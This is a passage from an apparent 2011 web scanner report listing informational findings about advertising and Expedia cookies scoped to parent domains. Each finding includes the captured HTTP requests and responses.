Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=Oq0ITgZJuzSN;Path=/;Domain=.providesupport.com
Content-Length: 5069
Date: Fri, 06 May 2011 18:39:54 GMT
Connection: close

var psu2TYsid = "Oq0ITgZJuzSN";
// safe-standard@gecko.js

var psu2TYiso;
try {
   psu2TYiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psu2TYwid != null);
} catch(e) {
   psu2TY
...[SNIP]...
17.25. http://int.teracent.net/tase/int  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/int?adv=206&fmt=redirect&sec=0&bizoid=3004,4024,2002 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=Mwf8VEP.X2PRIV; imp=a$le#1303349159766_32407932_ap2102_int|150#1303349107011_23701916_as2101_imp|; p150r=b$u-84#5.7Oy|c-t1_3X0PNEA9Ju0#1.7Oy|c-t2_3jnoWyampnx#1.7Oy|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p206r=b$u-3#5.7VA|c-2002#1.7VA|c-3004#1.7VA|c-4024#1.7VA|; Domain=.teracent.net; Expires=Thu, 03-Nov-2011 01:50:38 GMT; Path=/
Set-Cookie: imp=a$le#1304733038729_111974928_ap2101_int|150#1303349107011_23701916_as2101_imp|; Domain=.teracent.net; Expires=Thu, 03-Nov-2011 01:50:38 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Sat, 07 May 2011 01:50:38 GMT
Connection: close

GIF89a.............!.......,...........D..;
17.26. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=expediavis_cs=1&betq=10566=417781 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDU5OTE0NjsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=3tpwN5pqEIxFG/movUg3sYMFSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqFoxsGTRtrWQIzaIQRGQBg2cRpZm5IaYhxOSBsRpBB1I9IsfzF20i4WQBwWccmtCqGlHseWw7RaAgVSfBrLqxxNJUFQT2FAIruXQAzZAg0KXBbzqBAm6BF8sXGAIogZwrgYUBzWtBkoqxTN67GcNNGvYkAfwuRXEdum/BEOpxhOLUHsEpGzKq+fQoeZwsfO8BgwhhaX7/IUJtGhjZpTrRwFqFI09IG5Wo8iw5qYAcY6ACsMihNhAnjaYTIEv9F2E; F1=Bc3mC3kAAAAAmc1CAEAAJAgAAAAA6c1CAEAAJAABAAAABAAAAIAAgEA; BASE=Rgwq8yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrM!; ROLL=boAnr2C6PRAgcQG7fBnz6XH!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 22:33:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=AdHxN5pqEIxFGpgovQg3sY0rSKMCItdhKgQ3WXoCIsY4FqACw3ghKgQ7NYoCIoLOGqACKGehKgwmhXoCI8eDGqACdDmhKgwohXoCIQY4FqACYimhKgA3WaoCIoa4FqACA9qhKggdeZoCI4fFGqACbTehKgwKOaoCIoN5FqACC9qhKgwtZaoCIE0rGqACFBqhKgQTaaoCIY4dGqACNLqhKUrqEoxsG9atrSQIzaw2RGQBg2cxDYm5IaAIxOCBsRphb3I9HsfzFg+i4WQBwWEDmtCqGPBseWw7RaoGVSfBrLqRMMJUFQT2FqBruXQAzZoG0KXBbzqhak6BF8sXGqBogVwrgY8nzWdBkoqRuP67GcNNGZSkAfwuRXsDum/BEOpR8MLUHsEpGdEq+fQoeZYTfO8BgwhB1V7/HUJtGLtZpTrxKEqFI09IGjQo8iw5qYoCY6wBsMiBofAnjaA6HEv9FgeqGhQ9fZAc; domain=advertising.com; expires=Sun, 05-May-2013 22:33:36 GMT; path=/
Set-Cookie: GUID=MTMwNDcyMTIxNjsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Sun, 05-May-2013 22:33:36 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Fri, 06 May 2011 23:33:36 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;
17.27. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=EANON%3dA%253D0046022RDbVlp6eqWb6isumKV3rFQt3udP9lwzWM20Y-W-ezpQUAxtqLdZ4-soqLtpff94oc2oLJyVC06krou5v_Wa5Dr%2526E%253Db2c%2526W%253D1%7cNAP%3dV%253D1.9%2526E%253Dad2%2526C%253DTyTLJiYHPCovH3I7fPvWG8WWgxnFbQpamGFpO0Bcx8odiqKu6YYGUQ%2526W%253D1%7cMUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.acl`F4%p2Nl.UXEE*e?s.KZk)1P8:JhD>3]0OXTvN!yxE%+(uoie>W`_v8QfQ%yo5xj:Z3>gd/L60<:0H$58xf@TP8EN^Aa7.qES'cu)ziVp`aanbh'IXK_')9#*'OqB0__+7d).vaGpBe9>V?b=^3-#H@!=%>IE/HM`)s3*[`hUEAwY-atIxWZl:^crKe$Wt1spbWUvBdow<veb?3Uw`Qylwh>p+^c'w%R-eMV?4^a>]$!X9^RDTuLuZpl9=dIc4+hibOXVH]pX=n*N(IkV+>q<CtTaN9@TN[vcG0YnP[_kkdtZBM#*BPkSG*sGn'qtqEJRfmh/cT#?=zqiY3ojM*]3^))_1Y3qRhU>:L>>!Dl)nYWN]gI2[kI2tJIZ+8FY]jN]+3(Qs9TATHl_7jT6#4h1a$W8*.7q9]zqQE#xGPcCk0juhVuVnPk#`*0g?hvB@e$+*M!]Z7]Ptt.#jlw#oBt@MSlp@?XwWY[Zrh8s4X$Zn5(MSVl@QZq<pb6Inz$

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 07-May-2011 20:02:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Thu, 04-Aug-2011 20:02:53 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Fri, 06 May 2011 20:02:53 GMT

GIF89a.............!.......,........@..L..;
17.28. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.expedia.com
Path:   /media/content/expus/graphics/home/wiz/wizard_booking_image.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/content/expus/graphics/home/wiz/wizard_booking_image.gif?01AD=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg&01RI=929884BBD25FA5E&01NA= HTTP/1.1
Host: media.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; U9Z5=CT-1; bn_u=UNASSIGNED

Response

HTTP/1.1 200 OK
Content-Length: 6764
Content-Type: image/gif
Last-Modified: Tue, 29 Mar 2011 15:31:23 GMT
Accept-Ranges: bytes
ETag: "801725c26eecb1:0"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=900
Date: Fri, 06 May 2011 22:34:07 GMT
Connection: close
Set-Cookie: U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; expires=Fri, 03-Jun-2011 22:34:07 GMT; path=/; domain=.expedia.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR.......k.....(.-P...3IDATx..]    tU..>ku....v|...    ....V......^.g...
b..Je..0CH@D.......H.......A.... .j.X[[..Z...>.?.w.}nN..Mn..k}.s.......g...-Kk#..&^..)]...e......r...Q.V.62c.x!...4.q..
...[SNIP]...
17.29. http://media.expedia.com/media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.expedia.com
Path:   /media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/content/expus/graphics/launch/home/100824_newhp_wizard_topbtm.gif?01AD=31asoEm0mc0hSRC_UQuxKylRSxdaJclQQgaMS7SoRW6V0YY2Si6IhXg&01RI=07F690EFF3E413C&01NA= HTTP/1.1
Host: media.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; U9Z5=CT-1; bn_u=UNASSIGNED

Response

HTTP/1.1 200 OK
Content-Length: 7260
Content-Type: image/gif
Last-Modified: Tue, 24 Aug 2010 16:01:27 GMT
Accept-Ranges: bytes
ETag: "80e5a29ba543cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Fri, 06 May 2011 22:34:07 GMT
Connection: close
Set-Cookie: U9Z5=31asoEm0mc0hSRC_UQuxKylRSxdaJclQQgaMS7SoRW6V0YY2Si6IhXg; expires=Fri, 03-Jun-2011 22:34:07 GMT; path=/; domain=.expedia.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a2.J....Ul~'CX$Mj.........q..............8]v$Qn...x..7Zt....8\R]f1]}.=Z......edd............IT]....Bgp.........Jn...zyzmsx......\[[ANY...Nr....VVWOo.!Ps.=c.;b.Cg.@e.@f|{|RQR...i...8`.;a....Hl.Fj.
...[SNIP]...
17.30. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=18527;evt=15397;cat1=18280;cat2=18281;rand=7169916033744.81 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vt=9556:293096:548207:53962:0:1304340350:1|; adv_ic=BwEAAAB+p75NIAYGAAFJAAC0ViAHIAsDAAAAAA==; lyc=BAAAAARv+75NACAAAWVfIASgAARbUwAAcuAKF0AAAqAsv2AvAJAgI8AAAZdVwAngBRcDz08AAA==; pluto=822523287793|v1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:33:37 GMT
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=BgAAAASbLb9NACAAAZBTIASgAAWXVQAAnyzgCRcFz08AADELgBcBZV+gLCAAAFsgOwAe4AoXQAACQHfEYF8BX0hADYAAAWlHgAdAAOAFFwEAAA==; domain=.fastclick.net; path=/; expires=Sun, 05-May-2013 22:33:37 GMT
Set-Cookie: pluto=822523287793|v1; domain=.fastclick.net; path=/; expires=Sun, 05-May-2013 22:33:37 GMT

GIF89a.............!.......,...........D..;
17.31. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://om.expedia.com
Path:   /b/ss/expedia1/1/G.9p2/s91449721802491

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/expedia1/1/G.9p2/s91449721802491?[AQB]&ndh=1&t=6/4/2011%2022%3A33%3A33%205%20300&ce=ISO-8859-1&cdp=2&pageName=Home%20Page&g=http%3A//www.expedia.com/default.asp&ch=home&server=www.expedia.com&cc=USD&c12=80312807C795402E93C5016D2A2A3E1B&v17=Home%20Page&v18=Home%20Page&v32=Home%20Page&c34=658.0%7C820.0%7C808.1%7C843.1%7C976.0%7C1055.0%7C1110.0%7C975_0&v34=658.0%7C820.0%7C808.1%7C843.1%7C976.0%7C1055.0%7C1110.0%7C975_0&c50=G.20110422&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: om.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Fri, 06 May 2011 22:33:39 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E23BA185013347-6000011540167CC6[CE]; Expires=Wed, 4 May 2016 22:33:39 GMT; Domain=.expedia.com; Path=/
Location: http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491?AQB=1&pccr=true&vidn=26E23BA185013347-6000011540167CC6&&ndh=1&t=6/4/2011%2022%3A33%3A33%205%20300&ce=ISO-8859-1&cdp=2&pageName=Home%20Page&g=http%3A//www.expedia.com/default.asp&ch=home&server=www.expedia.com&cc=USD&c12=80312807C795402E93C5016D2A2A3E1B&v17=Home%20Page&v18=Home%20Page&v32=Home%20Page&c34=658.0%7C820.0%7C808.1%7C843.1%7C976.0%7C1055.0%7C1110.0%7C975_0&v34=658.0%7C820.0%7C808.1%7C843.1%7C976.0%7C1055.0%7C1110.0%7C975_0&c50=G.20110422&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Thu, 05 May 2011 22:33:39 GMT
Last-Modified: Sat, 07 May 2011 22:33:39 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www170
Content-Length: 0
Content-Type: text/plain

17.32. http://pix04.revsci.net/H07710/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07710/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Expedia_LP HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=naush134;u=9b6b0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d7db&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; rsiPus_cUAg="MLsXrtEupC5v4JDWbm5SF4iCa9rxq92nU/WOr6kAXZYdLpPAQvnyqW118N7oMEOiC2a+Qitt1jCSQnt7wOLuFf/9TQPsfq6IyG5KAtGyxR3fC69ZIS1PEfZ7+RJPbmgi5/Do4ttQz08XO1UZi7xW2INSPBRMu/rnPp04+54Ys4dei76PNAqSipahtYUfnrULkB+5OvuWzwKUC5dvku8yoxjK9eqMv+qsudi6yDI5p7sjklqfA/Df4499H+aU47uX/ZStvm7s0bSjla+AwzWAysWR5lO0C6CV3XcHBk4XAJoLy17PEAhkXQrA5UZbouz0UH099/lxSt54s7u/1vi/Ooc6ZsdHYnkAmIE7OjXRhH5swOnx+Qe7TQNTY5avAup317qWXxpxHGJHaYXIBQgZDvVvP1/FdYHpe4ELzEm01fLjZ3NRUu3RLcxJe/LWkVmHz79Zn9KKPtd8TZxCCYd1SF0BsJd/w4RxAXd8u6LUBqIMTYJLRCFBZYAqfyg3pMk+tHsbPBAY+t4e0y5XfrgZeOS5LS0raNTRDvmgWWyrK/P3YcYuQx+1XxK1YTDnTUoMKeILlN/WyNsBDbEYkH1exWL76rR83Bi3+v2FqFxztf6n5/2gdRHjcEt9bVnJ4z3dKF3kglsKfCM6oHY8rFN7qcjUzF9dx5DdQ3yk9RA="; rsi_us_1000000="pUMdIz9HMAYU1O2uQ7bkS/GtHFajpUjRHJppcTQ/E+fDv3TBS3u3eKtw/qV68iFxwFHQSUXJh/TEDlqK5ymryWN1lLpjgHRFDSYttD59YZFrXOXgP3z1GpnIeFgtFDR1F1h1DvPJ6jGxiMDbAnxQhvYqAwMe3iYLqU5GS2b8LfrTbx7uRJOZcXZTF1nqAhc9j1XANGppgAkqLrW5J/DkaoiGFOnArblFlMxnIUs81A34N/6VKULJ5NXcgY4g9jLOtCz0A2zRfBV0tB6nig79jyxsPK/BtufPnOuytnDMGwwiEdVEfx6xS+gdhVS/YoP8gws4gSC0AJdMoSjsujh74M9+Fuy742S9LEO0odVcgP8nwKkbsPsv3MIMTgRwUByQS0+3PTu18ZNX15PFr3nkMs5yPDt2381kVtM3tUsb7UTaDxWlFawllYsd+K30dHBKmeOvEyOfWttKqC8T1WwfifCTg5OqGJEWYbTZJKrVqzIxoqCSdeInRhO8LVs1qCHv/xxr5klEDkmKfHvF3yACOKWqmWc99TGbMUwf1jXvnMacDDEIRle75AsgC1t0n9TOjQlEvQUGZUlrBNuwrAyA8WHgji5OTrwi6ZAOSH/kv/L1brD7LtY7KfEaHdjvNdTzvoBUQMG4UTO6tV8OPsAUbmXYKs6T9V0kUdHDxS5IPWKMbw64OOcJPQgyRxyqJsiuBp3dvkWmsDV+KduhariE+vHGWgkxjV3chDQ3HlznmZrWkDHUMxVsE5mlY8EEUQt0ADLtrW3uR1r4wH3z3ZIdpJAGNmiIVyRr2c2b7jtBhTZxAAlNf7l7f35RlM2r3iTLGaF16IS79K9XrMEkuBHsy/k9wS+yaRUPCDErkqNr9YH2bA5/m2lDsmX2vxXhzSVPIsZH46KEZTqbjaFkaMVUv/ITp08VtIAQ1Yvu8ZknO30xfvR4vAy1AWEvvRf2fTQTa86Cxadw7P5qlBPGbbc96CWkKYIaCHYlvv56SO55p0Bo3OSWyjxverGSQYL67FQcst0Y+Jf/kIY+hq/65Cw5pVhi+rOWA5T/otP69RNqpLBD3wut5wpUIOU3A3cz+Fww/cmAfldRXnDpjDHyOUTv16cufUECTFP4HtE7b0vSWonFxeUXUs0PotTR+7l6VjT1pd6km8G3O6Jy+CinadIyS1ZkYM7x6spOGE5UiyQvx8Zs2WjO/p+duPiDfcEZGtR+HUDufru+EUMxg4w6AcWPnyFQbFw5FZSvULDb31fy7NREGAnb8nazQEJ7uSv7XT8wDJIORNgj0zbeAPjKWAlyPP3oRqS3CgRk7KsmlGuzBtB/H49kpYMT"; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de3fbf4&1&10592&4dbcb06d&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5EmBcXIQDrv8foMIxLwGjA3X27dOgaUluVNj9D506TXNtsL/yGow6EcUZB40BVxKu31EHezwrjztfPhfywGDnxOlPZh6OFobM/TJ/44BF3NGS7lkeUnkF3cOik+7vGWPnuMBy2aWvt8iTQxsOn1taZJdrR7gMIwDVr3u5ZG1BGnU1OEEyJobiVQxAfdIgY8NTDGQ9inwZmN6hYCBNWfttdeEB5dOfWGPO9lT3XjCU4wKvLp+pWmZ37Snoi3OQaH49LcYCduGsqPdjwJsxuFVmBKRFVneI0eWJ0CtUqnwQC5FNpEUESh/hAcaXN1ul74P/7JN1bKFfNPKJr8+Qi0bABaK1ks6X3TBL0H+mCMcQFy/cNknchZvrLkvREM43Ay9kS2roQGAv3hKPR/GkKs4E3oxTX885agAkWW1VV+YOmkbY6zG8TDQnbmOuBNKzgMK8Jf6B779+FmOch7bkeAbg/Nkx9gb29IyA/19J9hXx9V3XvSpoX027/hqY/YvCA6NnLh8w6TFdQ==; 